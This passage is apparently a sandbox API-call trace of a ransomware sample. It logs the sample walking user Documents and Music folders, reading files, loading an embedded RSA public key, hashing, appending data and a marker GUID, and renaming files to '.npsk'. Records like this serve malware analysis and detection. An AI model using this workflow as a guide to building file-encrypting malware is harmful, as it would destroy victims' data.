lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x4cdd, lpOverlapped=0x0) returned 1 [0217.156] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.156] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.156] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.156] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0217.158] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.158] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.158] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.158] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.158] GetLastError () returned 0x0 [0217.158] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.158] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0217.158] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.158] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.158] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.158] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.159] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x4cdd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.159] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.159] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.159] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.159] CloseHandle (hObject=0x61c) returned 1 [0217.160] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\IJSK h.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\ijsk h.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\IJSK h.csv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\ijsk h.csv.npsk")) returned 1 [0217.162] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4d7c890, ftCreationTime.dwHighDateTime=0x1d5e4bd, ftLastAccessTime.dwLowDateTime=0x8bfd75a0, ftLastAccessTime.dwHighDateTime=0x1d5da45, ftLastWriteTime.dwLowDateTime=0x8bfd75a0, ftLastWriteTime.dwHighDateTime=0x1d5da45, nFileSizeHigh=0x0, nFileSizeLow=0xd442, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QyxYyW87oYq6S.pptx", cAlternateFileName="QYXYYW~1.PPT")) returned 1 [0217.162] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\QyxYyW87oYq6S.pptx") returned=".pptx" [0217.163] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\QyxYyW87oYq6S.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\qyxyyw87oyq6s.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.163] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=54338) returned 1 [0217.163] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.165] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xd41c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.165] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.167] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.167] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xd442, lpOverlapped=0x0) returned 1 [0217.168] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.168] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.168] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.168] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0217.169] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.169] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.169] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.169] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.169] GetLastError () returned 0x0 [0217.169] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.169] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0217.170] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.170] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.170] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.170] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.171] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xd442, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.171] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.171] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.171] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.171] CloseHandle (hObject=0x61c) returned 1 [0217.181] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\QyxYyW87oYq6S.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\qyxyyw87oyq6s.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\QyxYyW87oYq6S.pptx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\qyxyyw87oyq6s.pptx.npsk")) returned 1 [0217.183] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22cc7df0, ftCreationTime.dwHighDateTime=0x1d5e30b, ftLastAccessTime.dwLowDateTime=0x26fee8f0, ftLastAccessTime.dwHighDateTime=0x1d5e0da, ftLastWriteTime.dwLowDateTime=0x26fee8f0, ftLastWriteTime.dwHighDateTime=0x1d5e0da, nFileSizeHigh=0x0, nFileSizeLow=0xcecc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UW_iTRUD2T.xls", cAlternateFileName="UW_ITR~1.XLS")) returned 1 [0217.183] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\UW_iTRUD2T.xls") returned=".xls" [0217.183] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\UW_iTRUD2T.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\uw_itrud2t.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.183] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=52940) returned 1 [0217.183] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.185] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xcea6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.185] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.187] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xcecc, lpOverlapped=0x0) returned 1 [0217.188] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.188] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.188] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.188] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0217.190] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.190] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.190] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.190] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.190] GetLastError () returned 0x0 [0217.190] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.190] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0217.190] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.190] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.190] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.191] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0217.191] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xcecc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.191] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.192] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.192] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.192] CloseHandle (hObject=0x61c) returned 1 [0217.193] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\UW_iTRUD2T.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\uw_itrud2t.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\zwRzh\\UW_iTRUD2T.xls.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\zwrzh\\uw_itrud2t.xls.npsk")) returned 1 [0217.195] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22cc7df0, ftCreationTime.dwHighDateTime=0x1d5e30b, ftLastAccessTime.dwLowDateTime=0x26fee8f0, ftLastAccessTime.dwHighDateTime=0x1d5e0da, ftLastWriteTime.dwLowDateTime=0x26fee8f0, ftLastWriteTime.dwHighDateTime=0x1d5e0da, nFileSizeHigh=0x0, nFileSizeLow=0xcecc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UW_iTRUD2T.xls", cAlternateFileName="UW_ITR~1.XLS")) returned 0 [0217.195] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.196] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.196] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.196] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\") returned="sg3CqdHoD\\" [0217.196] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\") returned="tCN4\\" [0217.196] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0217.196] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.196] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.196] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.196] PathFindFileNameW (pszPath="") returned="" [0217.196] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb4ecb10, ftCreationTime.dwHighDateTime=0x1d5dfb4, ftLastAccessTime.dwLowDateTime=0x6449fd0, ftLastAccessTime.dwHighDateTime=0x1d5d91c, ftLastWriteTime.dwLowDateTime=0x6449fd0, ftLastWriteTime.dwHighDateTime=0x1d5d91c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.199] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb4ecb10, ftCreationTime.dwHighDateTime=0x1d5dfb4, ftLastAccessTime.dwLowDateTime=0x6449fd0, ftLastAccessTime.dwHighDateTime=0x1d5d91c, ftLastWriteTime.dwLowDateTime=0x6449fd0, ftLastWriteTime.dwHighDateTime=0x1d5d91c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.199] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98a34ec0, ftCreationTime.dwHighDateTime=0x1d5def9, ftLastAccessTime.dwLowDateTime=0xca1d9ca0, ftLastAccessTime.dwHighDateTime=0x1d5e235, ftLastWriteTime.dwLowDateTime=0xca1d9ca0, ftLastWriteTime.dwHighDateTime=0x1d5e235, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="31nXcZ37 9zWspLRsh", cAlternateFileName="31NXCZ~1")) returned 1 [0217.199] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd058b130, ftCreationTime.dwHighDateTime=0x1d5e80d, ftLastAccessTime.dwLowDateTime=0x66669c0, ftLastAccessTime.dwHighDateTime=0x1d5de2c, ftLastWriteTime.dwLowDateTime=0x66669c0, ftLastWriteTime.dwHighDateTime=0x1d5de2c, nFileSizeHigh=0x0, nFileSizeLow=0x4f14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cC5yZDQeoG7WV 4j4fq.m4a", cAlternateFileName="CC5YZD~1.M4A")) returned 1 [0217.199] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\cC5yZDQeoG7WV 4j4fq.m4a") returned=".m4a" [0217.199] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\cC5yZDQeoG7WV 4j4fq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\cc5yzdqeog7wv 4j4fq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.200] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=20244) returned 1 [0217.200] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.202] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x4eee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.202] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.204] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | 